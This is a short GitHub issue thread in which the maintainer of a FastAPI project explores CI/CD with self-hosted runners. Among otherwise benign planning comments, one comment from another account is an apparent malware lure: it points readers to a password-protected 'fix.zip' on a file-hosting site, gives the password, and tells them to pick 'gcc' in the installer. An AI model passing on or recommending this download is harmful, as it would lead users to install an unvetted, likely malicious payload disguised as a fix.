### ISSUE TITLE
Explore CI/CD for testing and deployment

### ISSUE THREAD

**Issue by JamesRunnalls** [eawag-surface-waters-research/alplakes-fastapi#11]
Investigate using [GitHub runners](https://docs.github.com/en/actions/hosting-your-own-runners/managing-self-hosted-runners/adding-self-hosted-runners#adding-a-self-hosted-runner-to-a-repository) to do CI/CD for the repository.

- Run tests on pull requests to master
- Deploy on merges into master

**Comment by JamesRunnalls** [comment]
Some good examples here: https://github.com/fastapi/full-stack-fastapi-template

**Comment by JamesRunnalls** [comment]
May not be time-efficient due to limited number of builds

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JamesRunnalls** [comment]
Look into security risks for pubic repositories
